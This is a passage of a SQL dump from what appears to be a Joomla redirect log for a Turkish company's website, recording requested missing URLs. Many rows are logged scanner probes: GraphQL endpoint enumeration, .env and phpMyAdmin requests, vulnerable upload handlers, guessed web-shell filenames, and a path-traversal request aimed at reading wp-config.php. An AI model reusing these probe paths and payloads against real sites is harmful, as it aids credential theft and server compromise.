00:00:00',301),(29755,'http://3s-technologies.com.tr/tr/hakkä±mä±zda',NULL,'','',1,0,'2022-08-07 18:32:32','0000-00-00 00:00:00',301),(29756,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/wood-processing-ahşap-işleme',NULL,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/%C3%BCr%C3%BCnler/screen-printer/by,%60p%60.product_sku/dirDesc?language=tr-TR&keyword','',37,0,'2022-08-07 21:12:56','0000-00-00 00:00:00',301),(29757,'http://3s-technologies.com.tr/tr/wp-content/plugins/fluid_forms/file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',3,0,'2022-08-08 03:14:46','0000-00-00 00:00:00',301),(29758,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/aluminyum-iåÿleme-aluminum-processing',NULL,'','',4,0,'2022-08-08 12:46:46','0000-00-00 00:00:00',301),(29759,'https://3s-technologies.com.tr/___graphql',NULL,'','',1,0,'2022-08-08 15:09:11','0000-00-00 00:00:00',301),(29760,'https://3s-technologies.com.tr/query',NULL,'','',2,0,'2022-08-08 15:09:11','0000-00-00 00:00:00',301),(29761,'https://3s-technologies.com.tr/altair',NULL,'','',1,0,'2022-08-08 15:09:11','0000-00-00 00:00:00',301),(29762,'https://3s-technologies.com.tr/explorer',NULL,'','',1,0,'2022-08-08 15:09:12','0000-00-00 00:00:00',301),(29763,'https://3s-technologies.com.tr/graphiql',NULL,'','',2,0,'2022-08-08 15:09:12','0000-00-00 00:00:00',301),(29764,'https://3s-technologies.com.tr/api/v1/graphql',NULL,'','',1,0,'2022-08-08 15:09:12','0000-00-00 00:00:00',301),(29765,'https://3s-technologies.com.tr/graphiql.css',NULL,'','',2,0,'2022-08-08 15:09:12','0000-00-00 00:00:00',301),(29766,'https://3s-technologies.com.tr/graphiql/finland',NULL,'','',2,0,'2022-08-08 15:09:13','0000-00-00 00:00:00',301),(29767,'https://3s-technologies.com.tr/graphiql.js',NULL,'','',1,0,'2022-08-08 15:09:13','0000-00-00 00:00:00',301),(29768,'https://3s-technologies.com.tr/graphiql.min.css',NULL,'','',1,0,'2022-08-08 15:09:13','0000-00-00 00:00:00',301),(29769,'https://3s-technologies.com.tr/graphiql.min.js',NULL,'','',1,0,'2022-08-08 15:09:14','0000-00-00 00:00:00',301),(29770,'https://3s-technologies.com.tr/graphiql.php',NULL,'','',1,0,'2022-08-08 15:09:14','0000-00-00 00:00:00',301),(29771,'https://3s-technologies.com.tr/graphql/console',NULL,'','',2,0,'2022-08-08 15:09:14','0000-00-00 00:00:00',301),(29772,'https://3s-technologies.com.tr/graphql-explorer',NULL,'','',1,0,'2022-08-08 15:09:15','0000-00-00 00:00:00',301),(29773,'https://3s-technologies.com.tr/graphql.php',NULL,'','',2,0,'2022-08-08 15:09:15','0000-00-00 00:00:00',301),(29774,'https://3s-technologies.com.tr/graphql/schema.json',NULL,'','',2,0,'2022-08-08 15:09:15','0000-00-00 00:00:00',301),(29775,'https://3s-technologies.com.tr/graphql/schema.xml',NULL,'','',2,0,'2022-08-08 15:09:16','0000-00-00 00:00:00',301),(29776,'https://3s-technologies.com.tr/graphql/schema.yaml',NULL,'','',2,0,'2022-08-08 15:09:16','0000-00-00 00:00:00',301),(29777,'https://3s-technologies.com.tr/playground',NULL,'','',1,0,'2022-08-08 15:09:16','0000-00-00 00:00:00',301),(29778,'https://3s-technologies.com.tr/subscriptions',NULL,'','',1,0,'2022-08-08 15:09:16','0000-00-00 00:00:00',301),(29779,'https://3s-technologies.com.tr/api/graphql',NULL,'','',5,0,'2022-08-08 15:09:17','0000-00-00 00:00:00',301),(29780,'https://3s-technologies.com.tr/je/graphql',NULL,'','',1,0,'2022-08-08 15:09:17','0000-00-00 00:00:00',301),(29781,'https://3s-technologies.com.tr/graph',NULL,'','',1,0,'2022-08-08 15:09:17','0000-00-00 00:00:00',301),(29782,'https://3s-technologies.com.tr/v1/altair',NULL,'','',1,0,'2022-08-08 15:09:18','0000-00-00 00:00:00',301),(29783,'https://3s-technologies.com.tr/v1/explorer',NULL,'','',1,0,'2022-08-08 15:09:18','0000-00-00 00:00:00',301),(29784,'https://3s-technologies.com.tr/v1/graphiql',NULL,'','',1,0,'2022-08-08 15:09:18','0000-00-00 00:00:00',301),(29785,'https://3s-technologies.com.tr/v1/graphiql.css',NULL,'','',1,0,'2022-08-08 15:09:19','0000-00-00 00:00:00',301),(29786,'https://3s-technologies.com.tr/v1/graphiql/finland',NULL,'','',1,0,'2022-08-08 15:09:19','0000-00-00 00:00:00',301),(29787,'https://3s-technologies.com.tr/v1/graphiql.js',NULL,'','',1,0,'2022-08-08 15:09:19','0000-00-00 00:00:00',301),(29788,'https://3s-technologies.com.tr/v1/graphiql.min.css',NULL,'','',1,0,'2022-08-08 15:09:20','0000-00-00 00:00:00',301),(29789,'https://3s-technologies.com.tr/v1/graphiql.min.js',NULL,'','',1,0,'2022-08-08 15:09:20','0000-00-00 00:00:00',301),(29790,'https://3s-technologies.com.tr/v1/graphiql.php',NULL,'','',1,0,'2022-08-08 15:09:20','0000-00-00 00:00:00',301),(29791,'https://3s-technologies.com.tr/v1/graphql',NULL,'','',2,0,'2022-08-08 15:09:21','0000-00-00 00:00:00',301),(29792,'https://3s-technologies.com.tr/v1/graphql/console',NULL,'','',1,0,'2022-08-08 15:09:21','0000-00-00 00:00:00',301),(29793,'https://3s-technologies.com.tr/v1/graphql-explorer',NULL,'','',1,0,'2022-08-08 15:09:21','0000-00-00 00:00:00',301),(29794,'https://3s-technologies.com.tr/v1/graphql.php',NULL,'','',1,0,'2022-08-08 15:09:22','0000-00-00 00:00:00',301),(29795,'https://3s-technologies.com.tr/v1/graphql/schema.json',NULL,'','',1,0,'2022-08-08 15:09:22','0000-00-00 00:00:00',301),(29796,'https://3s-technologies.com.tr/v1/graphql/schema.xml',NULL,'','',1,0,'2022-08-08 15:09:22','0000-00-00 00:00:00',301),(29797,'https://3s-technologies.com.tr/v1/graphql/schema.yaml',NULL,'','',1,0,'2022-08-08 15:09:22','0000-00-00 00:00:00',301),(29798,'https://3s-technologies.com.tr/v1/playground',NULL,'','',1,0,'2022-08-08 15:09:23','0000-00-00 00:00:00',301),(29799,'https://3s-technologies.com.tr/v1/subscriptions',NULL,'','',1,0,'2022-08-08 15:09:23','0000-00-00 00:00:00',301),(29800,'https://3s-technologies.com.tr/v1/api/graphql',NULL,'','',1,0,'2022-08-08 15:09:23','0000-00-00 00:00:00',301),(29801,'https://3s-technologies.com.tr/v1/graph',NULL,'','',1,0,'2022-08-08 15:09:23','0000-00-00 00:00:00',301),(29802,'https://3s-technologies.com.tr/v2/altair',NULL,'','',1,0,'2022-08-08 15:09:24','0000-00-00 00:00:00',301),(29803,'https://3s-technologies.com.tr/v2/explorer',NULL,'','',1,0,'2022-08-08 15:09:24','0000-00-00 00:00:00',301),(29804,'https://3s-technologies.com.tr/v2/graphiql',NULL,'','',1,0,'2022-08-08 15:09:24','0000-00-00 00:00:00',301),(29805,'https://3s-technologies.com.tr/v2/graphiql.css',NULL,'','',1,0,'2022-08-08 15:09:24','0000-00-00 00:00:00',301),(29806,'https://3s-technologies.com.tr/v2/graphiql/finland',NULL,'','',1,0,'2022-08-08 15:09:25','0000-00-00 00:00:00',301),(29807,'https://3s-technologies.com.tr/v2/graphiql.js',NULL,'','',1,0,'2022-08-08 15:09:25','0000-00-00 00:00:00',301),(29808,'https://3s-technologies.com.tr/v2/graphiql.min.css',NULL,'','',1,0,'2022-08-08 15:09:25','0000-00-00 00:00:00',301),(29809,'https://3s-technologies.com.tr/v2/graphiql.min.js',NULL,'','',1,0,'2022-08-08 15:09:25','0000-00-00 00:00:00',301),(29810,'https://3s-technologies.com.tr/v2/graphiql.php',NULL,'','',1,0,'2022-08-08 15:09:26','0000-00-00 00:00:00',301),(29811,'https://3s-technologies.com.tr/v2/graphql',NULL,'','',1,0,'2022-08-08 15:09:26','0000-00-00 00:00:00',301),(29812,'https://3s-technologies.com.tr/v2/graphql/console',NULL,'','',1,0,'2022-08-08 15:09:26','0000-00-00 00:00:00',301),(29813,'https://3s-technologies.com.tr/v2/graphql-explorer',NULL,'','',1,0,'2022-08-08 15:09:26','0000-00-00 00:00:00',301),(29814,'https://3s-technologies.com.tr/v2/graphql.php',NULL,'','',1,0,'2022-08-08 15:09:27','0000-00-00 00:00:00',301),(29815,'https://3s-technologies.com.tr/v2/graphql/schema.json',NULL,'','',1,0,'2022-08-08 15:09:27','0000-00-00 00:00:00',301),(29816,'https://3s-technologies.com.tr/v2/graphql/schema.xml',NULL,'','',1,0,'2022-08-08 15:09:27','0000-00-00 00:00:00',301),(29817,'https://3s-technologies.com.tr/v2/playground',NULL,'','',2,0,'2022-08-08 15:09:27','0000-00-00 00:00:00',301),(29818,'https://3s-technologies.com.tr/v2/graphql/schema.yaml',NULL,'','',1,0,'2022-08-08 15:09:28','0000-00-00 00:00:00',301),(29819,'https://3s-technologies.com.tr/v2/subscriptions',NULL,'','',1,0,'2022-08-08 15:09:28','0000-00-00 00:00:00',301),(29820,'https://3s-technologies.com.tr/v2/api/graphql',NULL,'','',1,0,'2022-08-08 15:09:29','0000-00-00 00:00:00',301),(29821,'https://3s-technologies.com.tr/v2/graph',NULL,'','',1,0,'2022-08-08 15:09:29','0000-00-00 00:00:00',301),(29822,'https://3s-technologies.com.tr/v3/altair',NULL,'','',1,0,'2022-08-08 15:09:29','0000-00-00 00:00:00',301),(29823,'https://3s-technologies.com.tr/v3/explorer',NULL,'','',1,0,'2022-08-08 15:09:29','0000-00-00 00:00:00',301),(29824,'https://3s-technologies.com.tr/v3/graphiql',NULL,'','',1,0,'2022-08-08 15:09:30','0000-00-00 00:00:00',301),(29825,'https://3s-technologies.com.tr/v3/graphiql.css',NULL,'','',1,0,'2022-08-08 15:09:30','0000-00-00 00:00:00',301),(29826,'https://3s-technologies.com.tr/v3/graphiql/finland',NULL,'','',1,0,'2022-08-08 15:09:30','0000-00-00 00:00:00',301),(29827,'https://3s-technologies.com.tr/v3/graphiql.js',NULL,'','',1,0,'2022-08-08 15:09:30','0000-00-00 00:00:00',301),(29828,'https://3s-technologies.com.tr/v3/graphiql.min.css',NULL,'','',1,0,'2022-08-08 15:09:31','0000-00-00 00:00:00',301),(29829,'https://3s-technologies.com.tr/v3/graphiql.min.js',NULL,'','',1,0,'2022-08-08 15:09:31','0000-00-00 00:00:00',301),(29830,'https://3s-technologies.com.tr/v3/graphiql.php',NULL,'','',1,0,'2022-08-08 15:09:31','0000-00-00 00:00:00',301),(29831,'https://3s-technologies.com.tr/v3/graphql',NULL,'','',1,0,'2022-08-08 15:09:32','0000-00-00 00:00:00',301),(29832,'https://3s-technologies.com.tr/v3/graphql/console',NULL,'','',1,0,'2022-08-08 15:09:32','0000-00-00 00:00:00',301),(29833,'https://3s-technologies.com.tr/v3/graphql-explorer',NULL,'','',1,0,'2022-08-08 15:09:32','0000-00-00 00:00:00',301),(29834,'https://3s-technologies.com.tr/v3/graphql.php',NULL,'','',1,0,'2022-08-08 15:09:32','0000-00-00 00:00:00',301),(29835,'https://3s-technologies.com.tr/v3/graphql/schema.json',NULL,'','',2,0,'2022-08-08 15:09:33','0000-00-00 00:00:00',301),(29836,'https://3s-technologies.com.tr/v3/graphql/schema.xml',NULL,'','',2,0,'2022-08-08 15:09:33','0000-00-00 00:00:00',301),(29837,'https://3s-technologies.com.tr/v3/graphql/schema.yaml',NULL,'','',2,0,'2022-08-08 15:09:33','0000-00-00 00:00:00',301),(29838,'https://3s-technologies.com.tr/v3/playground',NULL,'','',2,0,'2022-08-08 15:09:33','0000-00-00 00:00:00',301),(29839,'https://3s-technologies.com.tr/v3/subscriptions',NULL,'','',2,0,'2022-08-08 15:09:34','0000-00-00 00:00:00',301),(29840,'https://3s-technologies.com.tr/v3/api/graphql',NULL,'','',1,0,'2022-08-08 15:09:34','0000-00-00 00:00:00',301),(29841,'https://3s-technologies.com.tr/v3/graph',NULL,'','',1,0,'2022-08-08 15:09:34','0000-00-00 00:00:00',301),(29842,'https://3s-technologies.com.tr/v4/altair',NULL,'','',1,0,'2022-08-08 15:09:35','0000-00-00 00:00:00',301),(29843,'https://3s-technologies.com.tr/v4/explorer',NULL,'','',2,0,'2022-08-08 15:09:35','0000-00-00 00:00:00',301),(29844,'https://3s-technologies.com.tr/v4/graphiql',NULL,'','',1,0,'2022-08-08 15:09:35','0000-00-00 00:00:00',301),(29845,'https://3s-technologies.com.tr/v4/graphiql.css',NULL,'','',1,0,'2022-08-08 15:09:35','0000-00-00 00:00:00',301),(29846,'https://3s-technologies.com.tr/v4/graphiql/finland',NULL,'','',1,0,'2022-08-08 15:09:36','0000-00-00 00:00:00',301),(29847,'https://3s-technologies.com.tr/v4/graphiql.js',NULL,'','',1,0,'2022-08-08 15:09:36','0000-00-00 00:00:00',301),(29848,'https://3s-technologies.com.tr/v4/graphiql.min.css',NULL,'','',1,0,'2022-08-08 15:09:36','0000-00-00 00:00:00',301),(29849,'https://3s-technologies.com.tr/v4/graphiql.min.js',NULL,'','',1,0,'2022-08-08 15:09:36','0000-00-00 00:00:00',301),(29850,'https://3s-technologies.com.tr/v4/graphiql.php',NULL,'','',1,0,'2022-08-08 15:09:37','0000-00-00 00:00:00',301),(29851,'https://3s-technologies.com.tr/v4/graphql',NULL,'','',1,0,'2022-08-08 15:09:37','0000-00-00 00:00:00',301),(29852,'https://3s-technologies.com.tr/v4/graphql/console',NULL,'','',1,0,'2022-08-08 15:09:37','0000-00-00 00:00:00',301),(29853,'https://3s-technologies.com.tr/v4/graphql-explorer',NULL,'','',1,0,'2022-08-08 15:09:37','0000-00-00 00:00:00',301),(29854,'https://3s-technologies.com.tr/v4/graphql.php',NULL,'','',1,0,'2022-08-08 15:09:38','0000-00-00 00:00:00',301),(29855,'https://3s-technologies.com.tr/v4/graphql/schema.json',NULL,'','',1,0,'2022-08-08 15:09:38','0000-00-00 00:00:00',301),(29856,'https://3s-technologies.com.tr/v4/graphql/schema.xml',NULL,'','',1,0,'2022-08-08 15:09:38','0000-00-00 00:00:00',301),(29857,'https://3s-technologies.com.tr/v4/graphql/schema.yaml',NULL,'','',1,0,'2022-08-08 15:09:38','0000-00-00 00:00:00',301),(29858,'https://3s-technologies.com.tr/v4/playground',NULL,'','',1,0,'2022-08-08 15:09:39','0000-00-00 00:00:00',301),(29859,'https://3s-technologies.com.tr/v4/subscriptions',NULL,'','',1,0,'2022-08-08 15:09:39','0000-00-00 00:00:00',301),(29860,'https://3s-technologies.com.tr/v4/api/graphql',NULL,'','',1,0,'2022-08-08 15:09:39','0000-00-00 00:00:00',301),(29861,'https://3s-technologies.com.tr/v4/graph',NULL,'','',1,0,'2022-08-08 15:09:39','0000-00-00 00:00:00',301),(29862,'https://3s-technologies.com.tr/v1',NULL,'','',1,0,'2022-08-08 15:09:41','0000-00-00 00:00:00',301),(29863,'https://3s-technologies.com.tr/v2',NULL,'','',1,0,'2022-08-08 15:09:41','0000-00-00 00:00:00',301),(29864,'https://3s-technologies.com.tr/v3',NULL,'','',1,0,'2022-08-08 15:09:42','0000-00-00 00:00:00',301),(29865,'https://3s-technologies.com.tr/graphql-console',NULL,'','',1,0,'2022-08-08 15:09:42','0000-00-00 00:00:00',301),(29866,'https://3s-technologies.com.tr/query-laravel',NULL,'','',1,0,'2022-08-08 15:09:42','0000-00-00 00:00:00',301),(29867,'https://3s-technologies.com.tr/graphql-devtools',NULL,'','',1,0,'2022-08-08 15:09:45','0000-00-00 00:00:00',301),(29868,'https://3s-technologies.com.tr/graphql/v1',NULL,'','',1,0,'2022-08-08 15:09:46','0000-00-00 00:00:00',301),(29869,'https://3s-technologies.com.tr/api/graphql/v1',NULL,'','',1,0,'2022-08-08 15:09:46','0000-00-00 00:00:00',301),(29870,'https://3s-technologies.com.tr/portal-graphql',NULL,'','',1,0,'2022-08-08 15:09:47','0000-00-00 00:00:00',301),(29871,'https://3s-technologies.com.tr/graphql-playground',NULL,'','',1,0,'2022-08-08 15:09:47','0000-00-00 00:00:00',301),(29872,'https://3s-technologies.com.tr/laravel-graphql-playground',NULL,'','',1,0,'2022-08-08 15:09:47','0000-00-00 00:00:00',301),(29873,'https://3s-technologies.com.tr/query-explorer',NULL,'','',1,0,'2022-08-08 15:09:47','0000-00-00 00:00:00',301),(29874,'https://3s-technologies.com.tr/sphinx-graphiql',NULL,'','',1,0,'2022-08-08 15:09:48','0000-00-00 00:00:00',301),(29875,'https://3s-technologies.com.tr/express-graphql',NULL,'','',1,0,'2022-08-08 15:09:48','0000-00-00 00:00:00',301),(29876,'https://3s-technologies.com.tr/hypergraphql',NULL,'','',1,0,'2022-08-08 15:09:48','0000-00-00 00:00:00',301),(29877,'https://3s-technologies.com.tr/graphql/graphql-playground',NULL,'','',1,0,'2022-08-08 15:09:49','0000-00-00 00:00:00',301),(29878,'https://mail.3s-technologies.com.tr/tr/pcb-prototip-prototyping',NULL,'https://mail.3s-technologies.com.tr/tr/','',42,0,'2022-08-08 15:47:46','0000-00-00 00:00:00',301),(29879,'https://mail.3s-technologies.com.tr/tr/wood-processing-ahşap-işleme',NULL,'https://mail.3s-technologies.com.tr/tr/','',42,0,'2022-08-08 15:47:47','0000-00-00 00:00:00',301),(29880,'https://mail.3s-technologies.com.tr/tr/akrilik-işleme-acrylic-processing',NULL,'https://mail.3s-technologies.com.tr/tr/','',42,0,'2022-08-08 15:47:47','0000-00-00 00:00:00',301),(29881,'https://mail.3s-technologies.com.tr/tr/aluminyum-işleme-aluminum-processing',NULL,'https://mail.3s-technologies.com.tr/tr/','',42,0,'2022-08-08 15:47:47','0000-00-00 00:00:00',301),(29882,'https://mail.3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/chosen.jquery.js?vmver=1ca80efd',NULL,'https://mail.3s-technologies.com.tr/components/com_virtuemart/assets/js/chosen.jquery.js?vmver=1ca80efd','',2,0,'2022-08-08 15:47:50','0000-00-00 00:00:00',301),(29883,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/akrilik-iåÿleme-acrylic-processing',NULL,'','',5,0,'2022-08-09 04:40:09','0000-00-00 00:00:00',301),(29884,'http://3s-technologies.com.tr/tr/akrilik-işleme-acrylic-processing',NULL,'http://3s-technologies.com.tr/tr/%C3%BCr%C3%BCnler/cnc/by,%60p%60.product_sku/dirDesc?language=tr-TR&keyword','',106,0,'2022-08-09 04:45:20','0000-00-00 00:00:00',301),(29885,'http://3s-technologies.com.tr/tr/admin/upload.php',NULL,'','',3,0,'2022-08-09 12:09:56','0000-00-00 00:00:00',301),(29886,'http://www.3s-technologies.com.tr/tr/80-turkish-tr/turkish-content/81-panasonic-am100-kampanya-2',NULL,'','',56,0,'2022-08-09 18:43:55','0000-00-00 00:00:00',301),(29887,'http://mail.3s-technologies.com.tr/tr/admin/api.update/tree',NULL,'','',1,0,'2022-08-10 06:04:10','0000-00-00 00:00:00',301),(29888,'http://mail.3s-technologies.com.tr/tr/admin/api.update/node',NULL,'','',1,0,'2022-08-10 06:04:11','0000-00-00 00:00:00',301),(29889,'http://mail.3s-technologies.com.tr/tr/phpqrcode/readme',NULL,'','',1,0,'2022-08-10 06:04:12','0000-00-00 00:00:00',301),(29890,'https://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri',NULL,'','',4,0,'2022-08-10 07:34:37','0000-00-00 00:00:00',301),(29891,'http://www.3s-technologies.com.tr/tr/assets/plugins/jquery-file-upload/server/php',NULL,'','',7,0,'2022-08-10 13:05:18','0000-00-00 00:00:00',301),(29892,'http://www.3s-technologies.com.tr/tr/assets/global/plugins/jquery-file-upload/server/php',NULL,'','',6,0,'2022-08-10 13:05:29','0000-00-00 00:00:00',301),(29893,'http://www.3s-technologies.com.tr/tr/admin/assets/plugins/jquery-file-upload/server/php',NULL,'','',6,0,'2022-08-10 13:05:37','0000-00-00 00:00:00',301),(29894,'http://www.3s-technologies.com.tr/tr/assets/plugins/jquery-fileupload/server/php',NULL,'','',3,0,'2022-08-10 13:05:58','0000-00-00 00:00:00',301),(29895,'http://www.3s-technologies.com.tr/tr/plugins/jquery-file-upload/server/php',NULL,'','',3,0,'2022-08-10 13:06:01','0000-00-00 00:00:00',301),(29896,'http://www.3s-technologies.com.tr/tr/assets/jquery-file-upload/server/php',NULL,'','',3,0,'2022-08-10 13:06:03','0000-00-00 00:00:00',301),(29897,'http://www.3s-technologies.com.tr/tr/ckeditor/kcfinder/upload.php',NULL,'','',3,0,'2022-08-10 13:06:06','0000-00-00 00:00:00',301),(29898,'http://www.3s-technologies.com.tr/tr/kcfinder/upload.php',NULL,'','',3,0,'2022-08-10 13:06:07','0000-00-00 00:00:00',301),(29899,'http://www.3s-technologies.com.tr/tr/ckeditor/plugins/kcfinder/upload.php',NULL,'','',2,0,'2022-08-10 13:06:09','0000-00-00 00:00:00',301),(29900,'http://www.3s-technologies.com.tr/tr/assets/plugin/kcfinder/upload.php',NULL,'','',1,0,'2022-08-10 13:06:11','0000-00-00 00:00:00',301),(29901,'http://www.3s-technologies.com.tr/tr/plugins/kcfinder/upload.php',NULL,'','',2,0,'2022-08-10 13:06:12','0000-00-00 00:00:00',301),(29902,'http://www.3s-technologies.com.tr/tr/admin/kcfinder/upload.php',NULL,'','',2,0,'2022-08-10 13:06:15','0000-00-00 00:00:00',301),(29903,'http://www.3s-technologies.com.tr/tr/js/kcfinder/upload.php',NULL,'','',2,0,'2022-08-10 13:06:18','0000-00-00 00:00:00',301),(29904,'http://www.3s-technologies.com.tr/tr/assets/kcfinder/upload.php',NULL,'','',2,0,'2022-08-10 13:06:21','0000-00-00 00:00:00',301),(29905,'http://www.3s-technologies.com.tr/en/79-english-uk/88-eko-cnc-en',NULL,'','',7,0,'2022-08-10 19:14:06','0000-00-00 00:00:00',301),(29906,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-ultra-hä±z/npm-w2-detail',NULL,'','',1,0,'2022-08-10 23:24:57','0000-00-00 00:00:00',301),(29907,'https://3s-technologies.com.tr/en/.env',NULL,'','',31,0,'2022-08-11 10:39:53','0000-00-00 00:00:00',301),(29908,'http://3s-technologies.com.tr/tr/ã¼rã¼nler',NULL,'','',2,0,'2022-08-11 18:56:18','0000-00-00 00:00:00',301),(29909,'http://3s-technologies.com.tr/tr/hadeshelldupl.php',NULL,'','',1,0,'2022-08-11 20:59:11','0000-00-00 00:00:00',301),(29910,'http://3s-technologies.com.tr/tr/wp-includes/class-wordpress-license.php',NULL,'','',1,0,'2022-08-11 21:01:27','0000-00-00 00:00:00',301),(29911,'http://3s-technologies.com.tr/tr/wp-includes/wp-shield-icon-managed.php',NULL,'','',1,0,'2022-08-11 21:01:42','0000-00-00 00:00:00',301),(29912,'http://3s-technologies.com.tr/tr/wp-includes/wp-system-opencloud.php',NULL,'','',1,0,'2022-08-11 21:01:55','0000-00-00 00:00:00',301),(29913,'http://3s-technologies.com.tr/tr/401.php',NULL,'','',1,0,'2022-08-11 21:02:50','0000-00-00 00:00:00',301),(29914,'http://3s-technologies.com.tr/tr/date.php',NULL,'','',35,0,'2022-08-11 21:05:19','0000-00-00 00:00:00',301),(29915,'http://3s-technologies.com.tr/tr/wp-admin/images/atomlib.php',NULL,'','',11,0,'2022-08-11 21:09:18','0000-00-00 00:00:00',301),(29916,'http://3s-technologies.com.tr/tr/wp-admin/radio.php',NULL,'','',50,0,'2022-08-11 21:09:23','0000-00-00 00:00:00',301),(29917,'http://3s-technologies.com.tr/tr/wp-blog.phpwp-class.php',NULL,'','',1,0,'2022-08-11 21:10:08','0000-00-00 00:00:00',301),(29918,'http://3s-technologies.com.tr/tr/wp-content/fx.php',NULL,'','',9,0,'2022-08-11 21:10:19','0000-00-00 00:00:00',301),(29919,'http://3s-technologies.com.tr/tr/wp-content/radio.php',NULL,'','',136,0,'2022-08-11 21:10:23','0000-00-00 00:00:00',301),(29920,'http://3s-technologies.com.tr/tr/wp-includes/991176.php',NULL,'','',21,0,'2022-08-11 21:10:45','0000-00-00 00:00:00',301),(29921,'http://3s-technologies.com.tr/tr/wp-includes/shell20211028.php',NULL,'','',22,0,'2022-08-11 21:10:59','0000-00-00 00:00:00',301),(29922,'http://3s-technologies.com.tr/en/wp-content/uploads/typehub/custom/ypbgrjsp/.v4.php',NULL,'www.google.com','',1,0,'2022-08-12 03:39:05','0000-00-00 00:00:00',301),(29923,'https://3s-technologies.com.tr/en/wp-content/uploads/typehub/custom/mgjhnavs/.v4.php',NULL,'www.google.com','',1,0,'2022-08-12 03:40:56','0000-00-00 00:00:00',301),(29924,'http://3s-technologies.com.tr/tr/wp-content/plugins/formcraft/file-upload/server/php/upload.php',NULL,'','',3,0,'2022-08-12 04:19:59','0000-00-00 00:00:00',301),(29925,'https://3s-technologies.com.tr/tr/phpmyadmin/index.php',NULL,'','',16,0,'2022-08-12 04:56:15','0000-00-00 00:00:00',301),(29926,'https://3s-technologies.com.tr/tr/ana-sayfa/80-turkish-tr/turkish-content/81-panasonic-am100-kampanya-2',NULL,'','',20,0,'2022-08-13 04:58:49','0000-00-00 00:00:00',301),(29927,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/panasonic/screen-printer?language=tr-tr&keyword=',NULL,'','',1,0,'2022-08-13 22:45:10','0000-00-00 00:00:00',301),(29928,'http://3s-technologies.com.tr/tr/wp-content/plugins/formcraft/file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',3,0,'2022-08-15 04:06:02','0000-00-00 00:00:00',301),(29929,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/smd-ultra-hä±z/by,product_name?language=tr-tr&keyword=',NULL,'','',1,0,'2022-08-15 08:58:07','0000-00-00 00:00:00',301),(29930,'http://3s-technologies.com.tr/tr/plugins/filemanager/php/connector.minimal.php',NULL,'','',1,0,'2022-08-16 15:01:04','0000-00-00 00:00:00',301),(29931,'http://3s-technologies.com.tr/en/wp-content/plugins/instabuilder2/assets/css/instabuilder2.css',NULL,'www.google.com','',2,0,'2022-08-16 21:46:31','0000-00-00 00:00:00',301),(29932,'http://3s-technologies.com.tr/en/wp/wp-content/plugins/instabuilder2/assets/css/instabuilder2.css',NULL,'www.google.com','',2,0,'2022-08-16 21:46:39','0000-00-00 00:00:00',301),(29933,'http://3s-technologies.com.tr/en/wordpress/wp-content/plugins/instabuilder2/assets/css/instabuilder2.css',NULL,'www.google.com','',2,0,'2022-08-16 21:46:49','0000-00-00 00:00:00',301),(29934,'http://3s-technologies.com.tr/en/blog/wp-content/plugins/instabuilder2/assets/css/instabuilder2.css',NULL,'www.google.com','',2,0,'2022-08-16 21:46:55','0000-00-00 00:00:00',301),(29935,'https://www.3s-technologies.com.tr/tr/akrilik-işleme-acrylic-processing',NULL,'https://www.3s-technologies.com.tr/tr/','',166,0,'2022-08-16 22:21:22','0000-00-00 00:00:00',301),(29936,'https://www.3s-technologies.com.tr/tr/wood-processing-ahşap-işleme',NULL,'https://www.3s-technologies.com.tr/tr/','',165,0,'2022-08-16 22:21:22','0000-00-00 00:00:00',301),(29937,'https://www.3s-technologies.com.tr/tr/pcb-prototip-prototyping',NULL,'https://www.3s-technologies.com.tr/tr/','',182,0,'2022-08-16 22:21:22','0000-00-00 00:00:00',301),(29938,'https://www.3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/chosen.jquery.js?vmver=1ca80efd',NULL,'https://www.3s-technologies.com.tr/components/com_virtuemart/assets/js/chosen.jquery.js?vmver=1ca80efd','',1,0,'2022-08-16 22:21:24','0000-00-00 00:00:00',301),(29939,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/wood-processing-ahşap-işleme',NULL,'','',22,0,'2022-08-17 04:03:30','0000-00-00 00:00:00',301),(29940,'http://3s-technologies.com.tr/tr/upload/server/php-directory/index.php?file=tf2rghf.jpg',NULL,'','',2,0,'2022-08-17 07:43:42','0000-00-00 00:00:00',301),(29941,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/using-joomla/extensions/templates/beez5/home-page-beez5/80-turkish-tr/turkish-content/81-panasonic-am100-kampanya-2',NULL,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/using-joomla/extensions/templates/beez5/home-page-beez5','',2,0,'2022-08-17 13:50:03','0000-00-00 00:00:00',301),(29942,'http://3s-technologies.com.tr/tr/wp-includes/images/css.php',NULL,'','',14,0,'2022-08-17 22:45:24','0000-00-00 00:00:00',301),(29943,'http://3s-technologies.com.tr/tr/wp-1ogin_bak.php',NULL,'','',3,0,'2022-08-17 22:46:29','0000-00-00 00:00:00',301),(29944,'http://3s-technologies.com.tr//upl.php?k=8d4aee29ecff46a2b5b085441a04cf27',NULL,'','',2,0,'2022-08-17 22:46:46','0000-00-00 00:00:00',301),(29945,'http://3s-technologies.com.tr//wp-admin/admin-post.php',NULL,'www.google.com','',1,0,'2022-08-18 06:18:45','0000-00-00 00:00:00',301),(29946,'http://3s-technologies.com.tr/en/wp-content/plugins/instabuilder2/cache/up.php',NULL,'www.google.com','',7,0,'2022-08-18 06:18:45','0000-00-00 00:00:00',301),(29947,'http://3s-technologies.com.tr/en/wp-content/plugins/fwduvp/content/downloader.php?path=../../../../wp-config.php&name=../../../../wp-config.php',NULL,'www.google.com','',1,0,'2022-08-18 06:18:47','0000-00-00 00:00:00',301),(29948,'http://www.3s-technologies.com.tr/tr/using-joomla/extensions/templates/beez5/home-page-beez5/80-turkish-tr/turkish-content/81-panasonic-am100-kampanya-2',NULL,'http://www.3s-technologies.com.tr/tr/using-joomla/extensions/templates/beez5/home-page-beez5/80-turkish-tr/turkish-content','',3,0,'2022-08-18 08:56:09','0000-00-00 